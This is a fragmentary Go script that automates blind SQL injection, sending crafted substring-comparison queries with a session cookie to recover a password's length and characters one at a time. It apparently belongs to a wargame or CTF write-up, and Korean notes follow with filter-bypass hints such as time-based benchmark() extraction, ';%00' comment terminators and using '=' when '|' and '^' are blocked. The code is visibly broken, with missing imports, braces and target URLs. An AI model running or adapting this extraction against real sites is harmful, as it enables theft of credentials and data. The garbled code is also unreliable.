package main

import (










const COOKIEVALUE string = ""

var limit int = 50

var index int = 0

var payload []string

var pwLength int = 0

func main() {




index = 0

blidSqlInjection(0, 0)

fmt.Println("%v", payload)


func matchFind(targetString string) bool {

r, _ := regexp.Compile("<h2>Hello.*</h2>")

var result []string

result = r.FindAllString(targetString, -1)

if len(result) > 0 {

return true

} else {

return false



func requestPost() {

url := ""

data := []byte(`{"hello": "world"}`)

req, err := http.NewRequest("POST", url, bytes.NewBuffer(data))

if err != nil {

log.Fatal("Error reading request. ", err)


// Set headers

req.Header.Set("Content-Type", "application/json")

req.Header.Set("Host", "")

// Create and Add cookie to request

cookie := http.Cookie{Name: "PHPSESSID", Value: COOKIEVALUE}


// Set client timeout

client := &http.Client{Timeout: time.Second * 10}

// Validate cookie and headers are attached



// Send request

resp, err := client.Do(req)

if err != nil {

log.Fatal("Error reading response. ", err)


defer resp.Body.Close()

fmt.Println("response Status:", resp.Status)

fmt.Println("response Headers:", resp.Header)

body, err := ioutil.ReadAll(resp.Body)

if err != nil {

log.Fatal("Error reading body. ", err)


fmt.Printf("%s\n", body)


func getLength(start int) int {


if index >= limit || start == 0 {

return -1


url1 := ""

url2 := strconv.Itoa(start) + "%23"

data := []byte(`{"hello": "world"}`)

url := url1 + url2

fmt.Println("Request URL : ", url)

req, err := http.NewRequest("GET", url, bytes.NewBuffer(data))

if err != nil {

log.Fatal("Error reading request. ", err)


// Set headers

req.Header.Set("Content-Type", "application/json")

// Create and Add cookie to request

cookie := http.Cookie{Name: "PHPSESSID", Value: COOKIEVALUE}


// Set client timeout

client := &http.Client{Timeout: time.Second * 10}

// Send request

resp, err := client.Do(req)

if err != nil {

log.Fatal("Error reading response. ", err)


defer resp.Body.Close()

//fmt.Println("response Status:", resp.Status)

body, err := ioutil.ReadAll(resp.Body)

if err != nil {

log.Fatal("Error reading body. ", err)


matchResult := matchFind(string(body))

if matchResult == true {

fmt.Println("Length : ", strconv.Itoa(start))

pwLength = start

return start



if matchResult == true {

getLength(start / 2)

} else {

getLength(start - 1)


return -1


func blidSqlInjection(start int, pwIndex int) int {


fmt.Println(index, start, pwLength, pwIndex)

if start == pwLength && pwLength == pwIndex {

return -1


if pwLength < pwIndex {

return -1


url1 := "," + strconv.Itoa(pwIndex) + ",1))="

url2 := strconv.Itoa(start) + "%23"

data := []byte(`{"hello": "world"}`)

url := url1 + url2

fmt.Println("Request URL : ", url)

req, err := http.NewRequest("GET", url, bytes.NewBuffer(data))

if err != nil {

log.Fatal("Error reading request. ", err)


// Set headers

req.Header.Set("Content-Type", "application/json")

// Create and Add cookie to request

cookie := http.Cookie{Name: "PHPSESSID", Value: COOKIEVALUE}


// Set client timeout

client := &http.Client{Timeout: time.Second * 10}

// Send request

resp, err := client.Do(req)

if err != nil {

log.Fatal("Error reading response. ", err)


defer resp.Body.Close()

//fmt.Println("response Status:", resp.Status)

body, err := ioutil.ReadAll(resp.Body)

if err != nil {

log.Fatal("Error reading body. ", err)


matchResult := matchFind(string(body))


if matchResult == true {

//fmt.Println("Length : ", strconv.Itoa(start))

//return start

payload = append(payload, string(start))

blidSqlInjection(0, pwIndex+1)

} else {

blidSqlInjection(start+1, pwIndex)


return -1


지금 사이트에선 문제이름이 바뀐듯 하지만 맨 마지막 문제

막 flag값이 변하고 임시 테이블 만들고 복잡한 문제지만 sleep() 서브쿼리?였던가 에러를 내서 더이상 테이블에서 flag값을 업데이트 못하게 막은 다음 sleep()가로 안에서 flag값을 비교해서 풀었던걸로 기억한다. 정확한 풀이는 기억이 안남 그럼 20000

전 문제랑 똑같음 다만 Time Base 여서 benchmark로 풀어야한다 

진우한테 받은 풀이같은데 앞으로 더 갈궈야지 ㅋㅋㅋㅋㅋㅋ

;%00이 주석처리문자;%00

사이트가 이전된후론 전 풀이가 먹히지 않는데 

| 와 ^ 연산은 안먹히고 =이 먹힌다.

원래는 문자열과 0을 | 이나 ^ 연산 하게되면 참이 되는 점을 이용한 문제인데 여기선 문자열과0 을 참으로 비교해도 참이 되는 점을 이용했다.

